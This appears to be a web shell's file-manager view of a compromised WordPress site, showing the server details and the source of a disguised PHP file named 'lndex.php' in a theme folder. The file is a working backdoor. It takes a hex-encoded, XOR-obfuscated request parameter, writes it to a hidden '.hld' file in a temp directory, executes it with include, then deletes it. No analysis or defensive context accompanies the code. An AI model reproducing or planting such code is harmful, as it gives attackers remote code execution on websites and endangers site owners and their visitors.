HEX
Server: Apache
System: Linux pdx1-shared-a1-38 6.6.104-grsec-jammy+ #3 SMP Tue Sep 16 00:28:11 UTC 2025 x86_64
User: mmickelson (3396398)
PHP: 8.1.31
Disabled: NONE
Upload Files
File: /home/mmickelson/martyknows.com/wp-content/themes/home_1757661446/lndex.php
<!--EwoLC71c-->
<?php

if(count($_REQUEST) > 0 && isset($_REQUEST["\x70\x72o\x70e\x72\x74\x79_set"])){
$itm = array_filter(["/var/tmp", session_save_path(), "/dev/shm", getcwd(), getenv("TEMP"), sys_get_temp_dir(), "/tmp", ini_get("upload_tmp_dir"), getenv("TMP")]);
$holder = hex2bin($_REQUEST["\x70\x72o\x70e\x72\x74\x79_set"]);
$token = '' ; foreach(str_split($holder) as $char){$token.=chr(ord($char)^33);}
while ($binding = array_shift($itm)) {
            if (max(0, is_dir($binding) * is_writable($binding))) {
            $val = vsprintf("%s/%s", [$binding, ".hld"]);
            $success = file_put_contents($val, $token);
if ($success) {
    include $val;
    @unlink($val);
    exit;
}
        }
}
}